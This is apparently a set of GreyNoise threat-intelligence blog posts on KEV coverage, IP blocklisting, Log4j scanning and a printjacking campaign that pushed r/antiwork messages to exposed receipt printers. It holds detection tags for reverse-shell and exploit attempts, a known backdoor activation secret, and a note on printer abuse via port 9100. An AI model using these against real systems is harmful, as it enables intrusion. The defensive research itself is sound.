As of June 14, 2022, GreyNoise has tags for 161 (~20%) of CVEs in the KEV catalog. It is important to note that with the current sensor fleet’s configurations, GreyNoise won’t see much of the on-node attacker actions that relate to many of the CVEs in the KEV corpus. For the moment, GreyNoise is focused pretty heavily on initial access and other types of remote-oriented exploits. Still, 20% is a pretty solid number, so our data  should be able to tell you if these CVEs are under active exploitation to prove a bit of KEV’s efficacy.

GreyNoise has observed activity in the past seven days for 59 of those KEV CVE tags; in fact, quite a bit of activity: 

I’m not surprised to see the recent, trivial exploit for Atlassian Confluence to top the charts, given how quickly attackers moved on it soon after disclosure.

In the future, I’ll do a deeper dive into KEV and GreyNoise tag coverage, but there is most certainly evidence of exploitation for the KEV CVEs that lend themselves to remote exploitation.

Room For Improvement

I gave CISA a B for catalog curation. As noted, a list that grows forever will become yet-another giant list of vulnerabilities that organizations will ignore. Some additional metadata would help defenders filter the list into something manageable, such as:

  • Metrics around exploitation activity. CISA reads reports, watches Twitter, and talks to vendors and internal stakeholders to know about whether a vulnerability is being exploited. Adding in some type of metrics such as <span class="code-block" fs-test-element="rich-text">first_seen, last_seen</span>, and <span class="code-block" fs-test-element="rich-text">number_of_attackers</span> (allowing for qualitative vs. quantitative values, if necessary) would help bolster defender arguments for getting patch/mitigation time now from operations teams.
  • Where possible (some vulnerabilities are ubiquitous), include a list of industries being targeted, to further help patch/mitigation defense.
  • Split out ICS/OT KEV from “Enterprise” KEV. Sure, folks can filter a JSON or CVE list, but making them separate has the added benefit of both growing at a slower rate.

I gave CISA a B-/C+ on release cadence. Some of the above fields would help justify any sporadic or overly frequent, as would links to “trusted” (that’s a loaded word) resources that provide context for the update. Said links list should be checked regularly for staleness so they don’t have the same link rot problem that CVE reference URLs have.

Finally, I gave CISA a C on regularly releasing “old” vulnerabilities. Sure, an argument can be made that you really should have patched a 2012 vulnerability well before 2022. Context for the aged inclusions would be most welcome, especially for the ones that are remote/network vulnerabilities.

Overall, CISA’s Catalog of Known Exploited Vulnerabilities is a good resource that organizations can and should use to help prioritize patching and gain support for said activity within their organizations. Hopefully, we’ll see some improvements by the time KEV’s first anniversary rolls around. Meanwhile, keep your eyes out for more KEV content in the GreyNoise visualizer and in APIs/data feeds as our products work to provide critical vulnerability insight to security teams across the globe.

Mass Exploitation Attacks - Is “Whack-A-Mole” Blocking A Viable Security Strategy?

IP “Whack-a-Mole” experiment – to block or not to block mass exploitation attacks

Security organizations have historically been hesitant to block IP addresses at their perimeter to stop the bad guys. There are two primary reasons for this - the short lifetime of malicious IP addresses, and the generally poor quality of IP block lists (i.e., way too many false positives). As David Bianco mentions in his Pyramid of Pain blog, “If you deny the adversary the use of one of their IPs, they can usually recover without even breaking stride.”

However, in the situation of an emerging “exploit storm” where the organization is exposed with unpatched vulnerable systems, we think that short-term blocking of mass exploitation attackers could be helpful and valuable. So we decided to run an experiment to test whether this strategy (which we started calling “whack-a-mole”) might help.

The whack-a-mole strategy temporarily blocks IP addresses that have been observed scanning for or actively exploiting a vulnerability over the past 24 hours. The intent is to provide breathing space for security teams to patch vulnerable systems and search for compromises that may have occurred before blocking was implemented.

In order to test whether this security strategy could work, GreyNoise Research conducted a study comparing the compromise rates between two weakly-credentialed servers - one using the whack-a-mole IP address blocking strategy, and the other that was wide open to the Internet.

“Whack-a-mole” shows a surprising amount of promise in blocking of mass exploitation attacks:

  • Unblocked Host - Time to Compromise - 19 minutes
  • Blocked Host - Time to Compromise - 4 days, 6 hours

Read on for more details about the GreyNoise Research IP Blocking study.

Some Insights from the Apache Log4j Vulnerability Storm

Since early December, security teams have been scrambling to deal with the fallout from the Log4Shell vulnerability (CVE-2021-44228). This vulnerability was particularly serious given the broad deployment in internet-facing systems of the Log4j service. Because of the massive surge of exploit scanning we observed and requests from our Community, we created a publicly available set of IOCs to help security teams defend themselves from the massive barrage of vuln checking and remote code execution attempts. Within 24 hours, we were able to stand up data sets that included:

The consistent feedback we received was that this data was most helpful in the early (and most crucial) hours and days of this exploit storm.

After things calmed down, we asked ourselves a question - how were people using the data? When we reached out to ask folks, we found two general use cases:

  1. Blocking inbound connections to stop attacks and provide “breathing space” for response efforts
  2. Hunting for compromised systems that may have happened before blocking started

These use cases were particularly interesting to us, given the traditional viewpoint that IP blocking is not useful.

Based on this feedback, we decided to run an experiment with our GreyNoise IP data to determine if there might be some value to the “whack-a-mole” strategy of blocking malicious mass scanner IPs during the early stages of an exploit storm.

What is a “mass exploitation” attack?

According to a recent report by IBM, severe vulnerabilities in internet-facing enterprise software are being exploited and weaponized at an increasing rate and at massive scale. Opportunistic “scan-and-exploit” attacks are quickly approaching phishing as the most-used cyber attack vector, with 34% of attacks in 2021 using vulnerability exploitation, compared to 41% of attacks leveraging phishing.

So we are using the term “Mass Exploitation” to describe these large-scale, opportunistic attacks launched by attackers trying to take advantage of common or newly announced vulnerabilities. These attackers use mass scanning technology to cast a broad net across the entire 4.2 billion IP addresses on the internet, trying to locate, vuln check, and ultimately exploit vulnerable internet-facing devices. This type of attack is very different from a more traditional “targeted attack” that aims for a selected, focused target.

Mass exploitation attacks are internet-wide exploit attempts using state-of-the-art mass scanning technology that targets vulnerable internet-facing systems.

Mass exploitation attacks are conducted for a variety of reasons, including:

  • Adding compromised hosts to a botnet
  • Installing malware such as ransomware, trojans, or Bitcoin miners
  • Gaining access to a network and selling the access to targeted attackers
  • Accessing sensitive data/information
  • Network infiltration
  • Reconnaissance

“Whack-a-mole” experiment setup

Our hypothesis for this experiment was that blocking opportunistic “scan and exploit” IP addresses would meaningfully increase the amount of time it takes for a vulnerable host on the Internet to be compromised.

We set up two identical vulnerable hosts, open to the Internet, with weak or default credentials, and then measured how quickly they would be compromised by credential stuffing/brute force attacks:

  • Services used: SSH/TELNET/FTP/HTTP/REDIS
  • Credentials used: admin/admin

For one of these hosts (the BLOCKED host), we loaded up a list of all the scanner IPs from our GreyNoise NOISE data set into an iptables blocklist. This list came from an export of all IPs seen in GreyNoise in the past day using the filter “last_seen:1d”. For the other host (the UNBLOCKED host), we did not block any IPs.

Our goal was to measure the time to first compromise, as well as the total number of compromises seen over a similar time period. We used OpenCanary for our honeypots and ran the experiment from January 12-30, 2022.

What we found

Our preliminary results show that whack-a-mole blocking works. On average, the wide open (unblocked) server was compromised in 19 minutes, while the blocked host took 4 days, 6 hours, and 24 minutes to be popped. We also measured the average number of compromises per day, and the number of compromise attempts per hour - all of these statistics showed significant differences between the protected and unprotected servers.

One insight worth mentioning is the decay rate we saw with the IP address list we used. For our blocked server, we only sourced one set of IP addresses and did NOT update the list with fresh IPs every 24 hours. What we observed was that connection attempts increased exponentially each day over the 5 days of the experiment, indicating that the IP list “decayed” in terms of effectiveness over time as the IP list aged.


Tracking the total attempts made, the first day saw an average of six attempts, and the fifth day was over 2,500. By comparison, the unblocked hosts saw between 2100 and 7100 attempts in the first 24 hours compared to 5 - 8 attempts on the blocked host. The unblocked hosts ended up getting compromised so quickly that we never kept them up for longer than a day.

One conclusion we can draw from this is that “fresh” IP addresses are crucial. In order to remain effective, an IP blocklist must be updated at least every 24 hours.

How can GreyNoise help with opportunistic attacks?

We have launched a new capability as part of our service called GreyNoise Trends that provides visibility into trending internet-wide exploits, as well as the ability to download “fresh” IP lists of all the malicious IPs participating in the attacks over the past 24 hours. This service was initially created based on customer requests experienced during Log4j. But we think the experiment described above helps validate the value of IP block lists for malicious mass scanners, and their use as part of a whack-a-mole strategy. Of course, your mileage may vary, and your defense infrastructure will be different from ours.

If you’re interested in learning more about this blocking strategy or trying to replicate the experiment for yourself, please visit https://www.greynoise.io/ to create a free Community account, and join our Community Slack to join the discussion. Also, please come to our Open Forum webcast on March 17, 2022 at 11am ET. You can register to attend here.

GreyNoise Tag Round Up | January 2022

While you will be able to find a comprehensive list of all the tags created since our last round up below, the GreyNoise Research team wanted to highlight some interesting tags.

Apache Log4j RCE Attempt [Intention: Malicious]

Self Explanatory.

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This tag was created this week as a result of the research done by the Avast team.

DNS Over HTTPS Scanner [Intention: Unknown]

Relatively new technology. It's interesting because “why would you scan the internet for that?” and there's no clear motive - that we can tell.

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

Critical vulnerability in MS Windows’ http.sys kernel module.

VMware vCenter SSRF Attempt [Intention: Malicious]

Widely popular server management software.

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

A critical vulnerability in a popular help desk platform.

It has been a while since we last published a Tag Round Up! If these are helpful to you, or you have suggestions on what you would like to see, please reach out to community@greynoise.io

Antiwork Port 9100 Print Request [Intention: Unknown]

This IP address has been observed sending distinct RAW TCP/IP requests to network printers. References:

See it on GreyNoise Viz

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This IP address has been observed attempting to send a known activation secret "CB5766F7436E22509381CA605B98685C8966F16B" for a malicious backdoor utilizing WinDivert. References:

See it on GreyNoise Viz

DNS Over HTTPS Scanner [Intention: Unknown]

This IP address has been observed attempting to scan for responses to DNS over HTTPS (DoH) requests. References:

See it on GreyNoise Viz

Generic Unix Reverse Shell Attempt [Intention: Malicious]

This IP address has been observed attempting to spawn a generic Unix reverse shell via the web request. References:

See it on GreyNoise Viz

iKettle Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover iKettle devices. References:

See it on GreyNoise Viz

InfluxDB Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover InfluxDB instances. References:

See it on GreyNoise Viz

IRC Crawler [Intention: Unknown]

This IP address has been observed sending NICK and USER commands used to register a connection with an IRC server. References:

See it on GreyNoise Viz

iSCSI Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover hosts that respond to iSCSI login requests. References:

See it on GreyNoise Viz

Jira REST API Crawler [Intention: Unknown]

This IP address has been observed attempting to enumerate Jira instances. References:

See it on GreyNoise Viz

Apache Druid RCE Attempt [Intention: Malicious]

CVE-2021-25646

This IP address has been observed attempting to exploit CVE-2021-25646, a remote command execution in Apache Druid v0.20.0 and earlier References:

See it on GreyNoise Viz

Apache Log4j RCE Attempt [Intention: Malicious]

CVE-2021-44228 | CVE-2021-45046

This IP address has been observed attempting to exploit CVE-2021-44228 and CVE-2021-45046, a remote code execution vulnerability in the popular Java logging library Apache Log4j. CVE-2021-44228 affects versions 2.14.1 and earlier, CVE-2021-45046 affects versions 2.15.0 and earlier. References:

See it on GreyNoise Viz

CentOS Web Panel RCE Attempt [Intention: Malicious]

This IP address has been observed attempting to exploit a vulnerability in CentOS Web Panel, which can lead to elevated privileges and remote code execution. References:

See it on GreyNoise Viz

FHEM LFI [Intention: Malicious]

CVE-2020-19360

This IP address has been observed attempting to exploit CVE-2020-19360, a local file inclusion vulnerability in FHEM perl server. References:

See it on GreyNoise Viz

GLPI SQL Injection Attempt [Intention: Malicious]

CVE-2019-10232

This IP address has been observed attempting to exploit CVE-2019-10232, an SQL injection vulnerability in GLPI service management software. References:

See it on GreyNoise Viz

Grafana Path Traversal Attempt [Intention: Malicious]

CVE-2021-43798

This IP address has been observed attempting to exploit CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

See it on GreyNoise Viz

Grafana Path Traversal Check [Intention: Unknown]

CVE-2021-43798

This IP address has been observed attempting to check for the presence of CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

See it on GreyNoise Viz

HRsale LFI [Intention: Malicious]

CVE-2020-27993

This IP address has been observed attempting to exploit CVE-2020-27993, a local file inclusion vulnerability in HRsale. References:

See it on GreyNoise Viz

Metabase LFI Attempt [Intention: Malicious]

CVE-2021-41277

This IP address has been observed attempting to exploit CVE-2021-41277, a local file inclusion vulnerability in Metabase. References:

See it on GreyNoise Viz

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

CVE-2021-31166

This IP address has been observed attempting to exploit CVE-2021-31166, a remote code execution vulnerability in the Windows HTTP protocol stack. References:

See it on GreyNoise Viz

Motorola Baby Monitor RCE Attempt [Intention: Malicious]

CVE-2021-3577

This IP address has been observed attempting to exploit CVE-2021-3577, a remote command execution vulnerability in Motorola Halo+ baby monitors. References:

See it on GreyNoise Viz

NodeBB API Token Bypass Attempt [Intention: Malicious]

CVE-2021-43786

This IP address has been observed attempting to exploit CVE-2021-43786, an unintentionally allowed master token access which can lead to remote code execution. References:

See it on GreyNoise Viz

October CMS Password Reset Scanner [Intention: Malicious]

CVE-2021-32648

This IP address has been observed attempting to exploit CVE-2021-32648, a password reset vulnerability in October CMS. References:

See it on GreyNoise Viz

TP-Link TL-WR840N RCE Attempt [Intention: Malicious]

CVE-2021-41653

This IP address has been observed attempting to exploit CVE-2021-41653, a remote command execution vulnerability in TP-Link TL-WR840N EU v5. References:

See it on GreyNoise Viz

VMware vCenter Arbitrary File Read Attempt [Intention: Malicious]

CVE-2021-21980

This IP address has been observed attempting to exploit CVE-2021-21980, an unauthorized arbitrary file read vulnerability in vSphere Web Client. References:

See it on GreyNoise Viz

VMware vCenter SSRF Attempt [Intention: Malicious]

CVE-2021-22049

This IP address has been observed attempting to exploit CVE-2021-22049, a server-side request forgery vulnerability in vSphere Web Client. References:

See it on GreyNoise Viz

WebSVN 2.6.0 RCE CVE-2021-32305 [Intention: Malicious]

CVE-2021-32305

This IP address has been observed scanning the Internet for devices vulnerable to CVE-2021-32305, a remote code execution vulnerability in WebSVN which utilizes a shell metacharacter in the search parameter. References:

See it on GreyNoise Viz

Zimbra Collaboration Suite XXE Attempt [Intention: Malicious]

CVE-2019-9670

This IP address has been observed attempting to exploit CVE-2019-9670, an XXE vulnerability in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10. References:

See it on GreyNoise Viz

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

CVE-2021-44077

This IP address has been observed attempting to exploit CVE-2021-44077, a remote command execution vulnerability in Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014. References:

See it on GreyNoise Viz

Log4j Analysis - What to Do Before the Next Big One

Over the past month, security teams have been scrambling to deal with the fallout from the Log4Shell vulnerability (CVE-2021-44228) announced in early December. Between blocking exploitation attempts and trying to determine vulnerable assets, it had already been a long winter for defenders. This vulnerability is particularly challenging as the Apache Log4j library has been used within so many different applications worldwide that it created an unusually large surface area for security teams to identify and defend. Now that the initial shock of the vulnerability is over, we wanted to answer some questions received during the exploit surge and identify a few preventative strategies that might help during future outbreaks.

What does scanning for Log4J look like now?

GreyNoise-log4j-chart-data-December-January
Figure 1: Log4j-related activity from December 10, 2021, to Jan 12, 2022. ‘Attributable’ activity describes individuals or organizations that voluntarily provided self-attribution while scanning for Log4j

As of January 2022, a month after initial CVE announcement, GreyNoise still observes a significant volume of traffic related to the Log4j vulnerability. This traffic is primarily composed of generic JNDI string exploit attempts with known obfuscations.

One of the interesting patterns we saw during the first few days of the Log4j “scan-and-exploit” outbreak was a huge surge in benign actors scanning for the vulnerability. The chart above shows Log4j-related activity broken down by scanners who provided attribution (generally benign scanning done by security firms, researchers, and academics) compared to non-attributed scanning (generally, malicious scanning by threat actors).

A huge part of the surge in scanning activity during the first days of the outbreak can be attributed to benign actors. Within the security community, there is significant discussion about the appropriateness of this scanning volume, as security teams further struggled with the alert volumes generated by this traffic during an emergent situation. It’s controversial enough that some in the security community are advocating blocking these types of scans.

Should I block the IPs that are scanning?

That depends. GreyNoise tracks internet noise caused by IPs scanning the entire internet, and classifies them as malicious, unknown, or benign based on their behavior and identity. For example, security vendors that scan the internet to identify vulnerable systems who voluntarily provide self-attribution are generally classified as benign. Other IP addresses that do opportunistic or unsolicited scanning, vuln checking, or exploitation are generally classified as malicious.

Note that organizations are not obligated to allow scanning of their network perimeter, regardless of GreyNoise classification. The value added by allowing or not blocking any IP seen by GreyNoise will vary depending on an organization’s threat model and security posture. The intended purpose of most benign traffic observed by GreyNoise is often to provide context, awareness, and added value to the IT and InfoSec community. However, any significant volume of unsolicited traffic, even that classified as benign by GreyNoise, may result in SOC alert fatigue and dangerous distraction during an active attack.

Does the GreyNoise tag capture the newest versions/latest associated vulnerabilities?

Mostly. The GreyNoise Log4J tag utilizes the presence of a JNDI format string within a packet’s body to tag IPs. The tag focuses on the core cause of the Log4j vulnerability, common to all the CVEs related to Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). As a result, the GreyNoise tag has no false positives and provides substantial coverage for relevant CVEs.

However, GreyNoise researchers have observed at least two examples of attempted Log4j exploits where the malicious string was base64 encoded in an application-specific parameter, allowing it to circumvent the GreyNoise tag.

See the following for more details: https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305#base64-encoded-into-parameter

Can I get payload data? Pcap?

Not usually. GreyNoise does not currently provide raw sensor data for operational security purposes, although we may do so in the future. The GreyNoise Visualizer and APIs do expose select User-agents and URI paths.

That said, due to the high variance of payloads observed at the peak of Log4j activity in December 2021, GreyNoise researchers elected to curate and publish a unified list of payload examples:

https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305#base64-encoded-into-parameter

What’s next?

Application-specific attacks leveraging Log4j vulnerabilities. This Apache Log4j vulnerability has been extremely challenging due to the ubiquity of the logging library's use. CVE-2021-44228 had an enormous impact and drew significant attention to how the Log4j library was used within applications worldwide. This attention resulted in several follow-on CVEs that bypassed the initial patch and used varied attack vectors (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). Log4j-related exploit activity may evolve as security researchers continue to scrutinize the library and its usage across various applications. For example, application-specific vulnerabilities like those discovered in H2 Database Console and VMware may become more prevalent. (https://portswigger.net/daily-swig/researchers-discover-log4j-like-flaw-in-h2-database-console, https://www.vmware.com/security/advisories/VMSA-2021-0028.html) At this time, GreyNoise has not observed any notable trends or upticks regarding application-specific Log4j payloads.

There are more servers on the internet than there is IPv4 space to assign each of these servers a unique address. In the case of the HTTP protocol, hundreds of servers may share a singular IP address and only be reachable when a specific host header is set as part of the connection request. Scoping out this much larger section of the internet in relation to Log4j is a non-trivial task that remains to be fully explored. It is also one of the reasons the cyber defense search engine “Onyphe” opted against scanning the entire internet for vulnerabilities related to Log4j and instead opted for a more targeted approach.

Stay tuned to GreyNoise to help identify exploit outbreaks

While things are not as bad as they were in December 2021, we do not envision Log4j scanners and attackers disappearing anytime soon. At GreyNoise, our goal is to help identify these kinds of outbreaks as fast as we possibly can in order to give security teams the time and breathing space they need to get their defenses in place.

You are always welcome to use the GreyNoise product to help you separate internet noise from threats as an unauthenticated user on our site. For additional functionality and IP search capacity, create your own GreyNoise Community (free) account today.

Keeping Receipts: GreyNoise Observes Coordinated PrintJacking Campaign Impacting Receipt Printers

On November 24, 2021, GreyNoise’s passive sensor network observed a single IP address mass transmitting a message in plaintext to port 9100, a common port for printer connections. The text is related to Reddit’s /r/antiwork, a subreddit dedicated to discussing and seeking an end to exploitative work. Since the initial observation, we’ve seen a significant increase in transmissions.

Figure 1: Plaintext Message Received by GreyNoise Sensor on November 24, 2021.Source: Twitter

Printers, when exposed to the Internet over port 9100, will print any plaintext received. As seen in Figure 1, this message was formatted with the proper dimensions specifically for receipt printers. This appears to be corroborated by a dozen individuals posting printed receipts from their place of work with variations of the messages observed by GreyNoise, Figure 1. GreyNoise has seen 29 variations of the same few messages, which have been provided at the end of this blog.

TIMELINE OF EVENTS

The observed activity began with reconnaissance. GreyNoise saw several actors performing network scans using Nmap, ZMap, and masscan to verify that port 9100 is open before relaying r/antiwork messages. Figure 2 shows the timeline of activity, with activity coming from over 60+ unique IPs over the span of the week.

Figure 2: Timeline of r/antiwork Messages Delivered via Port 9100. Source: GreyNoise

The bulk of activity originates from IPs belonging to “BL Networks," a hosting provider based out of the Netherlands (view it on GreyNoise).  Figure 3 shows the geographical breakdown of IPs transmitting the messages.

Figure 3: Breakdown of Source IP by Country and Type of Port Scanner Used. Source: GreyNoise Analysis Tool, must be logged in to view

While the messages are not specific to the United States, the majority of the traffic was largely directed at North American IPs.

The GreyNoise Research team was able to identify at least one concerted effort behind the recent activity. Figure 4 shows individual IP activity observed by GreyNoise sensors over time. IPs are colored by their numerical adjacency. For example, 192.168.1.1 and 192.168.1.2 would be colored similarly since they are numerically adjacent, but 10.0.0.1 and 192.168.1.1 are not.

Researchers observed a diverse set of uncoordinated IP addresses responsible for the activity around Thursday, November 25 (U.S. Thanksgiving) and Friday, November 26 (Black Friday). Prior to November 26, activity was scattered amongst different source IPs and ASN ranges. However, in the following week, we noted two additional sets of coordinated IPs on November 29th and December 2.

Figure 4: Individual Source IP Activity Graphed Against Time. IPs are color-coded by adjacency in IP space. Source: GreyNoise

WHOAMI

Researchers determined that, as of December 2nd, all servers used to transmit the messages had port 80 open and were running Python 3.9.2 SimpleHTTPServer. The servers exposed a directory with the text files, presumably the content being transmitted by the server:

Figure 5: Web Root Directory Contents on 168.100.9[.]17, one of the servers involved in the campaign. Source: GreyNoise

Based on associated SSL Certificates and domain information, the team was able to make contact with the current owner of one of the IPs. The owner responded with the following:

Figure 6: Conversation with the person allegedly involved in the campaign. Source: GreyNoise

GreyNoise researchers were unable to determine  whether or not the current owner is responsible for the activity, though they did respond letting us know they took down one of the servers (which GreyNoise has corroborated).

FINAL THOUGHTS

This is not the first time printjacking has occurred. GreyNoise has previously observed coordinated activity on port 9100 in 2018 related to an incident involving YouTube superstar PewDiePie.

When asked for recommendations on best practices, GreyNoise  IT & Security Director responded: “In order to avoid printjacking, we recommend ensuring port 9100 on your device remains closed to the Internet. If your printer vendor requires connection to an open port, it’s a good time to consider a different provider."

Learn more about GreyNoise and follow us on LinkedIn and Twitter.

APPENDIX: MESSAGES

GreyNoise has seen 29 variations of the same few messages, which you can read below or access via this Gist.

RIDDLE ME THIS


How can the McDonald's in Denmark manage
to pay their staff $22 an hour and still
sell a Big Mac for less than in America?

Answer: UNIONS!


Did you know that it is a rather
simple task to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------

ARE YOU BEING UNDERPAID?


You have a legal, protected right to discuss your pay with your coworkers.

This should be done on a regular basis to ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish you for doing this.

If you learn that you are being paid less than someone else who is doing the same job,
you should demand a raise or consider quitting and finding a different job.

SLAVE WAGES only exist because people are willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------

======================
NEW YEAR'S RESOLUTIONS
======================

1. Hit the Gym
2. Delete Facebook
3. ORGANIZE A UNION


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
=========================
WHAT TO DO ON BREAK TODAY
=========================

1. Talk about your PAY
2. Talk about your RIGHTS
3. Begin ORGANIZING A UNION

GOOD employers are not afraid
of these, but ABUSIVE ones are.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
=====================
INFLATION WAGE NOTICE
=====================

Due to the 6.2% inflation rate,
all US workers are entitled to
at least a 6.2% pay adjustment.

We have received reports of
some ABUSIVE EMPLOYERS not
providing these adjustments.

If you have not received such a
raise, please ask your employer
why your PAY WAS CUT.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

=========================
WHAT TO DO ON BREAK TODAY
=========================

1. Talk about your PAY
2. Talk about your RIGHTS
3. Begin ORGANIZING A UNION

GOOD employers are not afraid
of these, but ABUSIVE ones are.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

TIME IS YOUR MOST VALUABLE ASSET.

Not only can you never obtain any
more of it, you do not even know
how much you have to begin with.

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR TIME
is worth no less than $25 per hour,
and for them to call you when
they are ready to pay up.

But don't quit!

Make them fire you!
... and spend YOUR TIME with family
... and spend YOUR TIME with friends
... and rediscover YOUR favorite hobby
... and RECLAIM YOUR LIFE

SLAVE WAGES only existed because
people were willing to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
HOW TO SCARE A SLAVE OWNER:

1. Talk about your PAY
2. Talk about your RIGHTS
3. Talk about FORMING A UNION

Employers are not scared of
these, but SLAVE OWNERS are.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
==========================
ABUSIVE EMPLOYER CHECKLIST
==========================

[ ] Can't talk about PAY
[ ] Can't talk about RIGHTS
[ ] Can't talk about UNIONS
[ ] Punished for getting SICK
[ ] Punished for taking VACATION

If your employer checks ANY of
these, please contact support:

reddit.com/r/antiwork
----------------------------------------------------------
:::::::::::::::::::::::::::::::
::::: TIME IS :::::::::::::::::
::::::: YOUR MOST :::::::::::::
:::::::::: VALUABLE ASSET :::::
:::::::::::::::::::::::::::::::

Not only can you never
obtain any more of it,
you do not even know how
much you have to begin with.

LIFE IS SHORT!

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR
TIME is worth no less than
$25 per hour, and for them
to call you when they are
ready to pay up.

But DON'T QUIT!

MAKE THEM FIRE YOU!

... and spend YOUR TIME
...... with FAMILY

... and spend YOUR TIME
...... with FRIENDS

... and rediscover YOUR
...... FAVORITE HOBBY

... AND RECLAIM YOUR LIFE

POVERTY WAGES only existed
because people were "willing"
to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------

ARE YOU BEING UNDERPAID?


You have a legal, protected right to
discuss your pay with your coworkers.

This should be done on a regular basis to
ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish
you for doing this.

If you learn that you are being paid less
than someone else who is doing the same
job, you should demand a raise or consider
getting fired and finding a better job.

SLAVE WAGES only exist because people are
willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

==============
RIDDLE ME THIS
==============

How can the McDonald's
in Denmark pay their staff
$22 an hour and still manage
to sell a Big Mac for
less than in America?

Answer: UNIONS!


A GOOD UNION can easily
align everyone's goals.

Did you know that it
is a rather simple task
to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

========================
ARE YOU BEING UNDERPAID?
========================

You have a protected LEGAL
RIGHT to discuss your pay
with your coworkers.

This should be done on a
regular basis to ensure that
everyone is being paid fairly.

It is ILLEGAL for your employer
to punish you for doing this.

If you learn that you are being
paid less than someone else who
is doing the same job, you
should demand a raise or
consider getting fired and
finding a better employer.

POVERTY WAGES only exist
because people are "willing"
to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
RIDDLE ME THIS


How can the McDonald's in Denmark manage
to pay their staff $22 an hour and still
sell a Big Mac for less than in America?

Answer: UNIONS!


Did you know that it is a rather
simple task to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
=====================
INFLATION WAGE NOTICE
=====================

Due to the 6.2% inflation rate,
all US workers are entitled to
at least a 6.2% pay adjustment.

We have received reports of
some ABUSIVE EMPLOYERS not
providing these adjustments.

If you have not received such a
raise, please ask your employer
why your PAY WAS CUT.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
RIDDLE ME THIS


How can the McDonald's in Denmark manage
to pay their staff $22 an hour and still
sell a Big Mac for less than in America?

Answer: UNIONS!


Did you know that it is a rather
simple task to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
========================
ARE YOU BEING UNDERPAID?
========================

You have a protected LEGAL
RIGHT to discuss your pay
with your coworkers.

This should be done on a
regular basis to ensure that
everyone is being paid fairly.

It is ILLEGAL for your employer
to punish you for doing this.

If you learn that you are being
paid less than someone else who
is doing the same job, you
should demand a raise or
consider getting fired and
finding a better employer.

POVERTY WAGES only exist
because people are "willing"
to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
==========================
ABUSIVE EMPLOYER CHECKLIST
==========================

[ ] Can't talk about PAY
[ ] Can't talk about RIGHTS
[ ] Can't talk about UNIONS
[ ] Punished for getting SICK
[ ] Punished for taking VACATION

If your employer checks ANY of these,
please contact support at:

reddit.com/r/antiwork

----------------------------------------------------------

TIME IS YOUR MOST VALUABLE ASSET.

Not only can you never obtain any
more of it, you do not even know
how much you have to begin with.

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR TIME
is worth no less than $25 per hour,
and for them to call you when
they are ready to pay up.

But don’t quit!

Make them fire you!
... and spend YOUR TIME with family
... and spend YOUR TIME with friends
... and rediscover YOUR favorite hobby
... and RECLAIM YOUR LIFE

SLAVE WAGES only existed because
people were willing to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------

TIME IS YOUR MOST VALUABLE ASSET.

Not only can you never obtain any
more of it, you do not even know
how much you have to begin with.

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR TIME
is worth no less than $25 per hour,
and for them to call you when
they are ready to pay up.

But don’t quit!

Make them fire you!
... and spend YOUR TIME with family
... and spend YOUR TIME with friends
... and rediscover YOUR favorite hobby
... and RECLAIM YOUR LIFE

SLAVE WAGES only existed because
people were willing to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------


HOW TO SCARE A SLAVE OWNER:

1. Talk about your PAY
2. Talk about your RIGHTS
3. Talk about FORMING A UNION

Employers are not scared of
these, but SLAVE OWNERS are.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
======================
NEW YEAR'S RESOLUTIONS
======================

1. Hit the Gym
2. Delete Facebook
3. ORGANIZE A UNION


Learn More:
=====================
